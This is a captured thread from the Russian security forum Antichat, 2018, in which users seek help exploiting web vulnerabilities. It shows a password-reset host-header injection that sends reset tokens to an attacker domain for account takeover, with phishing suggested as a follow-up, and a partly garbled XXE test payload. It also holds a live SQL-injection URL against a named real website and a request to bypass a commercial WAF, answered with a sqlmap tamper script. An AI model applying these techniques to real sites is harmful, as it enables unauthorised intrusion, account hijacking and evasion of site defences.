HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2381  
Старый 01.08.2018, 23:10
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

 
Ответить с цитированием

  #2382  
Старый 06.08.2018, 19:27
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

При сбросе пароля

Код:
Code:
host=ataker.ru&mail=asd@mail.ru
На почте приходит

Код:
Code:
https://site.com/forgot/ataker.ru/973bb5606f94bbaa2509c25977f257f1ce203ea1
После смены пароля редиректит на ataker.ru

Как идея я могу на ataker.ru словить Referer тем самым добыть ссылку восстановления пароля

Есть другие идеи эксплуатации?

----------------------------

PS Также Бурп видет XML injection увидев DNS обращениепри при вводе xml с инклудом в host, обрашение приходит с IP Roundcube, Можете помоч?
 
Ответить с цитированием

  #2383  
Старый 06.08.2018, 22:39
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

После смены пароля редиректит на ataker.ru
Скорее всего, токен, после сброса пароля, станет невалидным, по крайней мере, так оно должно работать

Цитата:
Сообщение от Octavian  
Octavian said:

Есть другие идеи эксплуатации?
Если редиректит незаметно, без ворнингов, то фишинг вполне может пройти.

Цитата:
Сообщение от Octavian  
Octavian said:

PS Также Бурп видет XML injection увидев DNS обращениепри при вводе xml с инклудом в host, обрашение приходит с IP Roundcube, Можете помоч?
Этот момент не совсем ясен, нужно подробное описание или скриншоты. В качестве теста, можно попробовать заслать какой-нибудь простенький пейлод типа:

Код:
Code:

]>
&xxe;
И чекнуть резолв или реквест своего хоста в логах.
 
Ответить с цитированием

  #2384  
Старый 12.08.2018, 23:12
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:

Пускай поздно, но промолчать не могу.
Для вас и других, кто прочтёт сообщение.
XSS разделяют на:
Stored или Persistent - хранимые (в простонародье активные)
Reflected - отраженные (... пассивные)
DOM-Based
Self-XSS (как Stored, так и Reflected) - исполняемые только на личных страницах и сценариях пользователя и не доступные другим пользователям
То что вы описываете, это называется User Interaction (действие пользователя). Соответственно бывают и Stored XSS with/without User Interaction, так и Reflected XSS with/without User Interaction
Так он на 5-5:35 не прав что называет Reflect XSS активной?

Или он не правильно высказался что при Reflect XSS = отраженая с точке зрения воздействия это активная поскольку нужно деиствия от юзера, а Stored XSS = хранимая с точке зрения воздействия это пасивная поскольку не нужно деиствия от юзера?
 
Ответить с цитированием

  #2385  
Старый 13.08.2018, 22:13
panic.ker
Guest
Сообщений: n/a
Провел на форуме:
35643

Репутация: 3
По умолчанию

Жабу скинь. А вообще октавиан, "миллион" (необоснованная мной цифра) писали про это. Оваспы, разорчик подкидывает,бум оч хорошо пишет. Споров много, НО ВСЕ ЗАВИСИТ от вектора. Вот давай я щас дупля отобью, линков тебе накидаю чтоли. Ибо я не совсем трезв, к сожалению. Большой медведь верно говорит все
 
Ответить с цитированием

  #2386  
Старый 14.08.2018, 14:24
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Как защитится от Pixel Flood? Просто в вебе
 
Ответить с цитированием

  #2387  
Старый 24.08.2018, 07:03
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

[QUOTE="o314um"]
o314um said:

Есть одна интересная sql-inj.
Линк засветить не могу, но постараюсь дать максимально подробное описание.
немного условностей
№1 - обычный вывод информации на страницу
№2 - страница отображается, но без данных (не пустая страница)
№3 - пустая страница - скорее всего ситнтакксическая ошибка mysql (сам эррор не отображается)
[CODE]
Code:
id=62-1
 
Ответить с цитированием

  #2388  
Старый 26.08.2018, 13:02
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Код:
Code:
http://www.top50-solar.de/index.php?eID=tx_top50directory_pi2&L=1&tx_top50directory_pi2%5Bajaxcontroller%5D=searchziporcity&tx_top50directory_pi2%5Bcountrycode%5D=DEU%22)+order+by+1+--+
Есть варик на вывод колонок? проблема в том, что когда 1 колонка(по order by) ошибка страницы... по тайм байс перебор не берёт(
 
Ответить с цитированием

  #2389  
Старый 26.08.2018, 16:56
vikler
Guest
Сообщений: n/a
Провел на форуме:
36068

Репутация: 0
По умолчанию

Кто-нибудь обходил incapsula WAF при скуле?

Есть mssql injection внутри convert(int,query)

при введении @@version в параметр получаем версию mssql

При попытке (select+@@version), (select(@@version)) incapsula WAF реагирует, 403

в общем-то, все обычные методы типы апострофов, комментариев, encode, и тд, пробую - не пропускает Incapsula.

Есть у кого опыт? есть хоть какой рабочий вектор?
 
Ответить с цитированием

  #2390  
Старый 26.08.2018, 17:52
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:

Кто-нибудь обходил incapsula WAF при скуле?
Есть mssql injection внутри convert(int,query)
при введении @@version в параметр получаем версию mssql
При попытке (select+@@version), (select(@@version)) incapsula WAF реагирует, 403
в общем-то, все обычные методы типы апострофов, комментариев, encode, и тд, пробую - не пропускает Incapsula.
Есть у кого опыт? есть хоть какой рабочий вектор?
https://github.com/sqlmapproject/sql...f/incapsula.py

*** знает поможет или нет

отпишись если поможет
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ